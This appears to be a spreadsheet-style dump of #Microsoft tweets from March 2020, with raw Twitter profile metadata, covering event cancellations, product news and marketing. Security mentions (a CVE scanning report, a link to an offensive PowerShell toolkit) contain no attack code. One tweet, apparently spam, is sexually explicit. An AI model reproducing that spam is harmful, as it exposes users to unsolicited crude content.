    <t>{'id': 1212985318476877826, 'id_str': '1212985318476877826', 'name': 'Swetha Agarwal', 'screen_name': 'srinupikki1', 'location': '', 'description': "Passionate about my work, in love with my family and dedicated to spreading light. It's Swetha Agarwal", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 13, 'listed_count': 0, 'created_at': 'Fri Jan 03 06:33:41 +0000 2020', 'favourites_count': 30, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 46, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1220969531260067840/eIPmDBsL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220969531260067840/eIPmDBsL_normal.jpg',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</si>
  <si>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09:17:31 +0000 2020</t>
  </si>
  <si>
    <t>New #Intel Microcodes for Windows 10 Released to Fix CPU Bugs #MicrosoftWindows #MICROSOFT #softwarefixes https://t.co/8X7JGHi2gW https://t.co/wdEYBLPM7C</t>
  </si>
  <si>
    <t>Tue Mar 03 09:15:41 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Hololens 3D model
#Microsoft #Hololens #Windows #Samsung #Oculus #virtual #mixed #reality #headset #glasses #vr #connect #xiaomi #video #game #goggles #console #launch #3d #AR @CG_Trader 
Learn more:  https://t.co/4xkD6O8nJm
Check out my portfolio for more 3D models! https://t.co/3YK2JTVjZn</t>
  </si>
  <si>
    <t>Tue Mar 03 09:15:04 +0000 2020</t>
  </si>
  <si>
    <t>Its not long now until risual:NXT, join us on March 18th for a day of insights, presentations and of course...prizes!!!
https://t.co/Yq6ujGerHk 
#risualnxt #risualfam #microsoft https://t.co/yqgiUZYcym</t>
  </si>
  <si>
    <t>{'id': 82709115, 'id_str': '82709115', 'name': 'risual', 'screen_name': 'risual', 'location': 'UK', 'description': 'MS Government Finalist 2017. PSNS Partner of the Year Finalist 2016 &amp; MS Partner of the Year 2015. Providing Consultancy, Microsoft Solutions &amp; Managed Services', 'url': 'https://t.co/1YezaQZbnR', 'entities': {'url': {'urls': [{'url': 'https://t.co/1YezaQZbnR', 'expanded_url': 'https://risu.al/Qal1', 'display_url': 'risu.al/Qal1', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1808, 'friends_count': 999, 'listed_count': 98, 'created_at': 'Thu Oct 15 20:47:32 +0000 2009', 'favourites_count': 1857, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9927,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'http://pbs.twimg.com/profile_images/1212665595386302464/MJSJyYdM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212665595386302464/MJSJyYdM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/82709115/1578564626', 'profile_link_color': 'FCAF17', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E3E2DE', 'profile_text_color': '634047', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 09:14:31 +0000 2020</t>
  </si>
  <si>
    <t>new #PowerPlatform certificate? Check! sadly 2 days to late to claim my MS-Shirt... #microsoft #PowerAutomate #PowerBI #PowerApps  https://t.co/axrS1l0Qqm</t>
  </si>
  <si>
    <t>{'id': 1159554104265519105, 'id_str': '1159554104265519105', 'name': 'BjÃ¶rn', 'screen_name': 'Ginger365Guy', 'location': 'Kiel, Schleswig-Holstein', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 110, 'listed_count': 0, 'created_at': 'Thu Aug 08 19:56:56 +0000 2019', 'favourites_count': 122, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1233870309545119746/gnoFuMYn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233870309545119746/gnoFuMYn_normal.jpg',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</si>
  <si>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09:14:04 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus: Google, Microsoft Cancels Tech Summits in the US #Coronavirus #Google #Microsoft https://t.co/aPlKwWOQGX</t>
  </si>
  <si>
    <t>Tue Mar 03 09:14:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft cancels #MVPSummit due to #COVID-19 coronavirus fears https://t.co/nKuKG05ll3 via @ZDNet &amp;amp; @maryjofoley</t>
  </si>
  <si>
    <t>Tue Mar 03 09:10:56 +0000 2020</t>
  </si>
  <si>
    <t>Not long now #DoomEternal will be hitting #XBox 
We love our #Gaming #FPS &amp;amp; the @DOOM Series are #Bloody great shooters with a great edge &amp;amp; story line too. 
if you pre-order on #Microsoft Xbox console &amp;amp; a nice addition to the main game is... https://t.co/eUytIiRoHn</t>
  </si>
  <si>
    <t>{'id': 708421567919878145, 'id_str': '708421567919878145', 'name': 'Pop Quiz Hot Shot Showcase', 'screen_name': 'PQHSShowCase', 'location': '', 'description': 'Catch #ThePopQuizHotShotShowCase with @kubadave via @SwordRadioUK @VulcanSound @WRFN1025 With Music &amp; Artists from Movies Tv &amp; VideoGames', 'url': 'https://t.co/42lZEZBSUS', 'entities': {'url': {'urls': [{'url': 'https://t.co/42lZEZBSUS', 'expanded_url': 'https://www.facebook.com/1435482678/posts/10221926264572486/?d=n', 'display_url': 'facebook.com/1435482678/posâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 65, 'friends_count': 256, 'listed_count': 5, 'created_at': 'Fri Mar 11 22:37:18 +0000 2016', 'favourites_count': 1365, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2143, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1023643923972009984/jgyWsGz4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1023643923972009984/jgyWsGz4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/708421567919878145/1532890704',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</si>
  <si>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09:08:53 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/DsWRLLZHPD</t>
  </si>
  <si>
    <t>Tue Mar 03 09:07:00 +0000 2020</t>
  </si>
  <si>
    <t>Barbara Hallmans will kick off the next #HPE #Microsoft #Hybridcloud Summit in Lisbon Portugal March 5. Still time to register at https://t.co/AsFDKgpD1T 
#AzureStackHub #AzureStackHCI #mpgvip #HPEGreenlake @PTMicrosoft @luis_silva_in @mamajoamato @TatianaOspina_T @nimblegary https://t.co/2VpVCImsXh</t>
  </si>
  <si>
    <t>Tue Mar 03 09:06:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft have a tool that can change the way your business works. Find out what is Microsoft teams and if your business should be using it #teams #microsoft https://t.co/9JQWZsr0Fz</t>
  </si>
  <si>
    <t>{'id': 304894637, 'id_str': '304894637', 'name': 'Infotech Solutions', 'screen_name': 'InfotechUK', 'location': 'Rochester, Kent', 'description': 'IT Support company helping business grow by solving their #technology problems. Interested in all things #tech and helping #smallbusiness', 'url': 'http://t.co/TfdDW0zfkN', 'entities': {'url': {'urls': [{'url': 'http://t.co/TfdDW0zfkN', 'expanded_url': 'http://www.infotech.co.uk', 'display_url': 'infotech.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 651, 'friends_count': 849, 'listed_count': 51, 'created_at': 'Wed May 25 08:54:36 +0000 2011', 'favourites_count': 263, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5626, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E3E3E3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1139487869565919232/B5-HSz8L_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1139487869565919232/B5-HSz8L_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/304894637/1560510436', 'profile_link_color': '486316', 'profile_sidebar_border_color': 'C2D4AA', 'profile_sidebar_fill_color': 'C9E0AA', 'profile_text_color': '537A32', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 09:02:44 +0000 2020</t>
  </si>
  <si>
    <t>#linuxfoundation rapidly became #microsoft subsidiary     https://t.co/VYSAra4PcK</t>
  </si>
  <si>
    <t>Tue Mar 03 09:00:34 +0000 2020</t>
  </si>
  <si>
    <t>Read my Mar 3 #Microsoft Newsletter featuring Microsoft cancels... https://t.co/3lGwx0Q0DW Most interesting daily topics about Microsoft.</t>
  </si>
  <si>
    <t>Tue Mar 03 09:00:29 +0000 2020</t>
  </si>
  <si>
    <t>According to @SOC_Prime in the post on @Peerlyst, "Attackers look around for Microsoft Exchange servers vulnerable to CVE-2020-0688". #microsoft #exchange #CVE https://t.co/CYOW3zwj0q</t>
  </si>
  <si>
    <t>{'id': 3363992824, 'id_str': '3363992824', 'name': 'chiheb chebbi', 'screen_name': 'chihebchebbi201', 'location': '', 'description': '99% of the time my brain is thinking blah, meh, why, huh, WTF, food and computers. The other 1% iâ€™m usually asleep', 'url': 'https://t.co/pCb8H0ONAq', 'entities': {'url': {'urls': [{'url': 'https://t.co/pCb8H0ONAq', 'expanded_url': 'http://chiheb-chebbi.com', 'display_url': 'chiheb-chebbi.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 981, 'friends_count': 1338, 'listed_count': 18, 'created_at': 'Tue Jul 07 10:23:01 +0000 2015', 'favourites_count': 1207, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6603,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'http://pbs.twimg.com/profile_images/1059240518130061312/L6bvhR2a_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1059240518130061312/L6bvhR2a_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3363992824/1525042520',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</si>
  <si>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09:00:16 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/D8j3MIBV6u</t>
  </si>
  <si>
    <t>Tue Mar 03 09:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Working remotely during challenging times via Jared Spataro and orginally created by Lily  Zheng  #Microsoft #M365 https://t.co/5D9Ib4SKHW</t>
  </si>
  <si>
    <t>Tue Mar 03 09:00:01 +0000 2020</t>
  </si>
  <si>
    <t>Maybe Microsoft's Xbox Chief Didn't Say the Stupidest Thing About Cloud Gaming This Week https://t.co/QLZJ0s5cp6 #Microsoft #XCloud #Videogames #Cloud #Market https://t.co/1nib8NUDne</t>
  </si>
  <si>
    <t>Tue Mar 03 08:53:30 +0000 2020</t>
  </si>
  <si>
    <t>I think we got robbed in Sammamish. #MicrosoftIreland #Microsoft #workflow #alwaysontheroad #alwaysonthego #dublin @ One Microsoft Place https://t.co/FuEaGrBlOy</t>
  </si>
  <si>
    <t>{'id': 169359222, 'id_str': '169359222', 'name': 'L. Daniel Bertrand', 'screen_name': 'LDanielBertrand', 'location': 'Houston, TX', 'description': 'Husband. Father. Dude making it happen.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 111, 'friends_count': 282, 'listed_count': 11, 'created_at': 'Thu Jul 22 04:16:34 +0000 2010', 'favourites_count': 47, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2946,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'http://pbs.twimg.com/profile_images/378800000582589106/385f3b0d4635fa0e1f357c97e424aa2a_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000582589106/385f3b0d4635fa0e1f357c97e424aa2a_normal.png',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</si>
  <si>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08:52:05 +0000 2020</t>
  </si>
  <si>
    <t>[Tweakers] #Microsoft schrapt Ignite The Tour-evenement in #Amsterdam wegens coronavirus - https://t.co/HRgiVNekVS #nieuws #technews</t>
  </si>
  <si>
    <t>{'id': 1052785512, 'id_str': '1052785512', 'name': 'Gerrit', 'screen_name': 'SchorelWeb', 'location': 'Dordrecht', 'description': '| Gerrit | ICT | Computers | Internet | Vader van 2 | Yamaha PSR-S910 | Wandelen | Fietsen | Genieten | Prettig GestÃ²Ã³rd :-D', 'url': 'https://t.co/favLf3M3rw', 'entities': {'url': {'urls': [{'url': 'https://t.co/favLf3M3rw', 'expanded_url': 'https://g.schorelweb.nl/', 'display_url': 'g.schorelweb.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5046, 'friends_count': 5246, 'listed_count': 357, 'created_at': 'Tue Jan 01 15:16:00 +0000 2013', 'favourites_count': 22943, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 575360,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'http://pbs.twimg.com/profile_images/944892014319079426/ikIZ3Ilv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/944892014319079426/ikIZ3Ilv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1052785512/1570568450',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</si>
  <si>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Tue Mar 03 08:52:02 +0000 2020</t>
  </si>
  <si>
    <t>[Tweakers] #Microsoft schrapt Ignite The Tour-evenement in #Amsterdam wegens coronavirus - https://t.co/9hrmMwo0P8 #nieuws #technews</t>
  </si>
  <si>
    <t>{'id': 2894524133, 'id_str': '2894524133', 'name': 'ProviderLijst', 'screen_name': 'ProviderLijst', 'location': 'Nederland', 'description': '#ProviderLijst  Onafhankelijk &amp; objectief.  https://t.co/TdibWzk4AT\n\n#Mobiele #Telefoon #Internet #Provider #Aanbieder #MVNO #ISP', 'url': 'https://t.co/TdibWzBFsr', 'entities': {'url': {'urls': [{'url': 'https://t.co/TdibWzBFsr', 'expanded_url': 'https://www.providerlijst.nl/', 'display_url': 'providerlijst.nl', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/TdibWzk4AT', 'expanded_url': 'https://www.providerlijst.nl/', 'display_url': 'providerlijst.nl', 'indices': [44, 67]}]}}, 'protected': False, 'followers_count': 867, 'friends_count': 865, 'listed_count': 86, 'created_at': 'Thu Nov 27 11:53:57 +0000 2014', 'favourites_count': 133, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 81947,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'http://pbs.twimg.com/profile_images/1182281589750980610/uOhvLWw__normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1182281589750980610/uOhvLWw__normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2894524133/1417090007',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</si>
  <si>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08:51:08 +0000 2020</t>
  </si>
  <si>
    <t>Is it just me or does it feel like #dotnetcore 3 has only just come to the fore yet the EOL is happening this week. Seriously?  https://t.co/G8WAJYBA7b #dotnet #Microsoft #Software #Csharp #eol</t>
  </si>
  <si>
    <t>Tue Mar 03 08:51:05 +0000 2020</t>
  </si>
  <si>
    <t>Media coverage from the 7th Sankalp Africa Summit : Our Strategic Partner Microsoft offers startups free cloud tech. Read more https://t.co/5WfNQvTRHd #SankalpAfricainmedia #Microsoft   @intellecapceo @Raivineet @IntellecapTweet @SankalpForum</t>
  </si>
  <si>
    <t>{'id': 1376876408, 'id_str': '1376876408', 'name': 'Aavishkaar', 'screen_name': 'AavishkaarVC', 'location': 'Mumbai', 'description': "Aavishkaar's vision is to catalyze equitable development globally by supporting entrepreneurial intervention through provision of risk capital. #impinv #socent", 'url': 'http://t.co/ZE94ZS2FeI', 'entities': {'url': {'urls': [{'url': 'http://t.co/ZE94ZS2FeI', 'expanded_url': 'http://www.aavishkaar.in/', 'display_url': 'aavishkaar.in', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2069, 'friends_count': 162, 'listed_count': 80, 'created_at': 'Wed Apr 24 11:57:50 +0000 2013', 'favourites_count': 109, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12403,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'http://pbs.twimg.com/profile_images/1185131064374611969/jn47jfr6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1185131064374611969/jn47jfr6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1376876408/1571312932',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</si>
  <si>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08:48:17 +0000 2020</t>
  </si>
  <si>
    <t>#PowerBI has been crowned as the leader in the Gartner 2020 Magic Quadrant for Analytics and Business Intelligence Platforms, for the 13th consecutive year  
https://t.co/GPHPhk9HgQ
#powerbi #microsoft #gartnermagicquadrant #businessintelligence #analytics #data</t>
  </si>
  <si>
    <t>Tue Mar 03 08:47:55 +0000 2020</t>
  </si>
  <si>
    <t>I do not often fuck in a tender ass. Painfully #Maryland  #microsoft #transgender https://t.co/EQAy7AsJmu</t>
  </si>
  <si>
    <t>{'id': 1234576077189779457, 'id_str': '1234576077189779457', 'name': 'Alejandra Taylor', 'screen_name': 'precpetrighnus', 'location': 'Irvine, USA', 'description': 'Love Sayings That Will Touch Your Hearts', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Mon Mar 02 20:27:36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'http://pbs.twimg.com/profile_images/1234597364280807424/W6Wrp7sS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234597364280807424/W6Wrp7sS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234576077189779457/1583185970',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</si>
  <si>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08:43:11 +0000 2020</t>
  </si>
  <si>
    <t>SWIPE]&amp;gt;&amp;gt;&amp;gt;Data security is vital to the overall wellbeing of an organization. 
Your deliverables, financial records and employee records all need protection. 
If compromised, could leads to reputational and financial damages
#velvotng #microsoft #security #MadeInLagos #CHELIV https://t.co/wAfka8sS0q</t>
  </si>
  <si>
    <t>Tue Mar 03 08:43:01 +0000 2020</t>
  </si>
  <si>
    <t>SWIPE]&amp;gt;&amp;gt;&amp;gt;Data security is vital to the overall wellbeing of an organization. 
Your deliverables, financial records and employee records all need protection. 
If compromised, could leads to reputational and financial damages
#velvotng #microsoft #security #techie #tuesdayvibes https://t.co/e5vIIAJNUx</t>
  </si>
  <si>
    <t>Tue Mar 03 08:43:00 +0000 2020</t>
  </si>
  <si>
    <t>Most registered UK charities qualify for free #Microsoft #Office365 subscriptions. We also provide a pro-bono email, OneDrive &amp;amp; SharePoint migration service to qualifying charities. 
#Cloud #CloudComputing #charitytuesday</t>
  </si>
  <si>
    <t>{'id': 249388186, 'id_str': '249388186', 'name': 'Kemlyn Consultants', 'screen_name': 'Kemlyn_IT', 'location': 'UK', 'description': 'Business technology company providing Virtual IT Management #CloudComputing #VOIP #CCTV &amp; Managed Printers/Copiers #Office365 #Cloud', 'url': 'https://t.co/UXgqiqkXkv', 'entities': {'url': {'urls': [{'url': 'https://t.co/UXgqiqkXkv', 'expanded_url': 'http://www.kemlyn.co.uk', 'display_url': 'kemlyn.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3141, 'friends_count': 2137, 'listed_count': 1143, 'created_at': 'Tue Feb 08 23:20:39 +0000 2011', 'favourites_count': 554, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 64692, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3B94D9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/922510391799943170/s5w8Bqnx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/922510391799943170/s5w8Bqnx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/249388186/1482423988', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 08:42:32 +0000 2020</t>
  </si>
  <si>
    <t>#Download this #new #document #tracking #template and #track all your #project #documentation -simple solutions for all businesses  https://t.co/2vAY6xy0Eb
#simple #easy #microsoft #docs #smallbusiness #Startups #picture #design #excel #spreadsheet #powerpoint #register #value https://t.co/7jYHfxpWww</t>
  </si>
  <si>
    <t>Tue Mar 03 08:38:37 +0000 2020</t>
  </si>
  <si>
    <t>Nishang - Offensive PowerShell for red team, penetration testing and offensive security https://t.co/El0sEX8AqN  #microsoft #informationsecurity #cybersecurity https://t.co/7UYeY8shdj</t>
  </si>
  <si>
    <t>{'id': 437666082, 'id_str': '437666082', 'name': 'Maik Ellerbrock', 'screen_name': 'frapsoft', 'location': 'Germany ðŸ‡©ðŸ‡ª', 'description': 'Father, Husband &amp; Fulltime Geek | Solutions Architect @Rackspace (opinions are my own)', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1095, 'friends_count': 4008, 'listed_count': 149, 'created_at': 'Thu Dec 15 17:57:55 +0000 2011', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3705,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'http://pbs.twimg.com/profile_images/958739793839443968/oNOaExBZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/958739793839443968/oNOaExBZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/437666082/1583493009',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</si>
  <si>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08:38:34 +0000 2020</t>
  </si>
  <si>
    <t>Start of the @tradegovuk Civil Nuclear Showcase in London. Attending with @KognitivSpark Looking forward to discussing how immersive tech can transform work in the nuclear sector. #nuclear #HL2 #Microsoft #MixedReality</t>
  </si>
  <si>
    <t>{'id': 86736401, 'id_str': '86736401', 'name': 'Charles Jenkins', 'screen_name': 'c_e_jenkins', 'location': 'Wilmslow England', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 147, 'listed_count': 0, 'created_at': 'Sun Nov 01 14:59:36 +0000 2009', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 101, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3B94D9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1189524087674167296/atxWs5ia_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189524087674167296/atxWs5ia_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/86736401/1508091693', 'profile_link_color': '4A913C',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</si>
  <si>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Tue Mar 03 08:37:42 +0000 2020</t>
  </si>
  <si>
    <t>Why choose Microsoft Dynamics 365 to run your business
#DynamicsBusinessSolutions #Microsoft #MicrosoftDynamic365 #MicrosoftDynamics #Dynamics365 #UAE #Dubai #AbuDhabi
https://t.co/FGEBsDkhOD https://t.co/LzdPPMxTLh</t>
  </si>
  <si>
    <t>Tue Mar 03 08:37:03 +0000 2020</t>
  </si>
  <si>
    <t>How to IMPROVE workplace communication?
#workplace #communication #Saudi #Gulf #Microsoft #MSDynAX #DynamicsAx #HCM #Dynamics365 #MsDyn365 https://t.co/Ld0UseGUYk</t>
  </si>
  <si>
    <t>{'id': 3192115627, 'id_str': '3192115627', 'name': 'Solvait', 'screen_name': 'Solvait', 'location': 'Riyadh, Saudi Arabia', 'description': 'The Leading Human Capital Management solutions provider for Microsoft Dynamics AX and Microsoft Dynamics 365 in the Middle East and especially in GULF.', 'url': 'https://t.co/rINZHKVx0C', 'entities': {'url': {'urls': [{'url': 'https://t.co/rINZHKVx0C', 'expanded_url': 'https://www.solvait.com/', 'display_url': 'solvait.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 92, 'friends_count': 1, 'listed_count': 22, 'created_at': 'Mon May 11 12:31:44 +0000 2015', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 507,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'http://pbs.twimg.com/profile_images/1065711527628603398/9v-yu4g7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1065711527628603398/9v-yu4g7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3192115627/1516140171', 'profile_link_color': '3399FF',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</si>
  <si>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08:36:21 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft joins in the Robotic Process Automation race with Power Automate which helps automate legacy systems backed by and the integrations with more than 300 modern apps and services and AI capabilities.
 #microsoft #powerautom...https://t.co/lexoDMNMWw https://t.co/80Zztgks7K</t>
  </si>
  <si>
    <t>{'id': 477061676, 'id_str': '477061676', 'name': 'Eromosele Omomhenle', 'screen_name': 'eromoseleenergy', 'location': 'Washington, USA', 'description': 'Experienced Technology Leader and Global Energy &amp; Climate Change Expert', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 148, 'friends_count': 235, 'listed_count': 1, 'created_at': 'Sat Jan 28 19:59:57 +0000 2012', 'favourites_count': 565, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1033,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'http://pbs.twimg.com/profile_images/1221354332823515136/UNPUCC82_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221354332823515136/UNPUCC82_normal.jpg', 'profile_link_color': '12A1E3', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '99CC33', 'profile_text_color': '3E4415', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 08:34:39 +0000 2020</t>
  </si>
  <si>
    <t>#100DaysOfCode Day 15 - Been out of training for a while due to work and home life, but back now. On a course at work for #Kubernetes on #Microsoft #Azure. Very interesting... Need to get back into playing around on Azure.</t>
  </si>
  <si>
    <t>{'id': 57293406, 'id_str': '57293406', 'name': 'Ash Fourie', 'screen_name': 'AGFourie', 'location': 'Cape Town, South Africa', 'description': '.net Developer. Certified Scrum Master. #xbox gamer. #Microsoft technology fanboy. Enjoys reading fantasy novels &amp; comic books. #DnD #DnD5e DM', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 901, 'friends_count': 1789, 'listed_count': 149, 'created_at': 'Thu Jul 16 09:56:00 +0000 2009', 'favourites_count': 1908, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5394,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'http://pbs.twimg.com/profile_images/883712172802666496/lTm3FOFS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/883712172802666496/lTm3FOFS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/57293406/1439992256', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Tue Mar 03 08:34:01 +0000 2020</t>
  </si>
  <si>
    <t>Printing services in the cloud, named #universalprint announced by #Microsoft https://t.co/dUo8VzRD8F #Software #CloudComputing #cloud #TechNews</t>
  </si>
  <si>
    <t>Tue Mar 03 08:33:29 +0000 2020</t>
  </si>
  <si>
    <t>Reminder that #microsoft killed #nokia when Nokia was a top 3 #linux contributor https://t.co/IFIto6xLLF  see https://t.co/ii9OOF2xrf</t>
  </si>
  <si>
    <t>Tue Mar 03 08:31:04 +0000 2020</t>
  </si>
  <si>
    <t>Don't be fooled. #Cloud and on-premise ERP solutions might look identical, yet there are often costs below the surface. This free TCO Iceberg Infographic explains:    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/xsPvTgoITz</t>
  </si>
  <si>
    <t>{'id': 17731003, 'id_str': '17731003', 'name': 'paresh', 'screen_name': 'pvs255', 'location': 'mumbai', 'description': "IT professional,interested in networking;love to know about new technology; we deal in Microsoft ,adobe,CA,and other leading vendor's software", 'url': 'http://t.co/3x2bhJPGbq', 'entities': {'url': {'urls': [{'url': 'http://t.co/3x2bhJPGbq', 'expanded_url': 'http://www.phteknow.com', 'display_url': 'phteknow.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 625, 'friends_count': 942, 'listed_count': 97, 'created_at': 'Sat Nov 29 08:39:57 +0000 2008', 'favourites_count': 8541, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4538,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'http://pbs.twimg.com/profile_images/834390286637883394/bSrXKNev_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/834390286637883394/bSrXKNev_normal.jpg', 'profile_banner_url': 